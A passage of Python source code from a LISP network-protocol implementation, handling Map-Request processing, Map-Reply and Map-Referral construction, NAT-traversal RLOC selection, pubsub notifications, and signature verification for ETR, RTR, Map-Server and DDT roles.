addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and lisp_rtr_list.has_key(rtr)):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
